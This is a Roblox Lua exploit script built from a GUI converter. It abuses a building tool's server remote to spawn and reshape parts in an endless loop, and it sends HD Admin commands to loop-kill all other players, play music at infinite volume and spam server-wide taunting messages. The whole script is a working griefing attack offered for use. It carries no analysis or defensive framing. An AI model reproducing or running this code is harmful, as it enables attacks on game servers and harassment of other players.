-- Gui to Lua -- Version: 3.2 -- Instances: local ScreenGui = Instance.new("ScreenGui") local TextLabel = Instance.new("TextLabel") local ImageLabel = Instance.new("ImageLabel") --Properties: ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.Enabled = false ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui.ResetOnSpawn = false TextLabel.Parent = ScreenGui TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextLabel.BackgroundTransparency = 1.000 TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0.0468164794, 0, 0.399398386, 0) TextLabel.Size = UDim2.new(0, 200, 0, 50) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "the mouse is running to make the script running" TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0) TextLabel.TextSize = 14.000 ImageLabel.Parent = ScreenGui ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) ImageLabel.BorderSizePixel = 0 ImageLabel.Position = UDim2.new(0.0861423239, 0, 0.496323496, 0) ImageLabel.Size = UDim2.new(0, 100, 0, 100) ImageLabel.Image = "rbxassetid://5112109703" -- Scripts: local function EBCLA_fake_script() -- ScreenGui.LocalScript local script = Instance.new('LocalScript', ScreenGui) local player = game.Players.LocalPlayer local char = player.Character local tool for i,v in player:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end for i,v in game.ReplicatedStorage:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end --craaa remote = tool.SyncAPI.ServerEndpoint function _(args) remote:InvokeServer(unpack(args)) end function SetCollision(part,boolean) local args = { [1] = "SyncCollision", [2] = { [1] = { ["Part"] = part, ["CanCollide"] = boolean } } } _(args) end function SetAnchor(boolean,part) local args = { [1] = "SyncAnchor", [2] = { [1] = { ["Part"] = part, ["Anchored"] = boolean } } } _(args) end function CreatePart(cf) local args = { [1] = "CreatePart", [2] = "Normal", [3] = cf, [4] = workspace } _(args) end function DestroyPart(part) local args = { [1] = "Remove", [2] = { [1] = workspace.Part } } _(args) end function MovePart(part,cf) local args = { [1] = "SyncMove", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf } } } _(args) end function Resize(part,size,cf) local args = { [1] = "SyncResize", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf, ["Size"] = size } } } _(args) end function AddMesh(part) local args = { [1] = "CreateMeshes", [2] = { [1] = { ["Part"] = part } } } _(args) end function SetMesh(part,meshid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["MeshId"] = "rbxassetid://"..meshid } } } _(args) end function SetTexture(part, texid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["TextureId"] = "rbxassetid://"..texid } } } _(args) end function SetName(part, stringg) local args = { [1] = "SetName", [2] = { [1] = workspace.Part }, [3] = stringg } _(args) end function MeshResize(part,size) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["Scale"] = size } } } _(args) end hrpcf = player.Character.HumanoidRootPart.CFrame while wait(0.5) do x = hrpcf.x z = hrpcf.z randint = math.random(-600,600) randint2 = math.random(-600,600) xloc = randint + x zloc = randint2 + z cf = player.Character.HumanoidRootPart.CFrame.y + 400 spawn(function() CreatePart(CFrame.new(math.floor(xloc), math.random(cf,cf+400), math.floor(zloc))) for i,v in game.Workspace:GetDescendants() do if v.Name == "Part" and v.Parent == workspace and v.CFrame.x == math.floor(xloc) and v.CFrame.z == math.floor(zloc) then SetName(v,"b_1337") SetAnchor(false,v) AddMesh(v) Resize(v, Vector3.new(100,100,100),v.CFrame) MeshResize(v,Vector3.new(3,3,3)) SetMesh(v,"614605299") SetTexture(v, "614605300") SetCollision(v,false) else end end end) end end coroutine.wrap(EBCLA_fake_script)() local function WVGFR_fake_script() -- ScreenGui.LocalScript local script = Instance.new('LocalScript', ScreenGui) game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";music 79999206651848") game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";pitch 0.22") game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";volume inf") end coroutine.wrap(WVGFR_fake_script)() local function UURDNT_fake_script() -- ScreenGui.LocalScript local script = Instance.new('LocalScript', ScreenGui) game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";loopkill others") end coroutine.wrap(UURDNT_fake_script)() local function NHTCZOI_fake_script() -- ScreenGui.LocalScript local script = Instance.new('LocalScript', ScreenGui) while true do game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";serverMessage Get toadroasted you bacon-haired") wait(2) end end coroutine.wrap(NHTCZOI_fake_script)() local function URTEN_fake_script() -- ScreenGui.LocalScript local script = Instance.new('LocalScript', ScreenGui) while true do game:GetService("ReplicatedStorage").HDAdminHDClient.Signals.RequestCommand:InvokeServer(";serverHint Get toadroasted you bacon-haired") wait(2) end end coroutine.wrap(URTEN_fake_script)()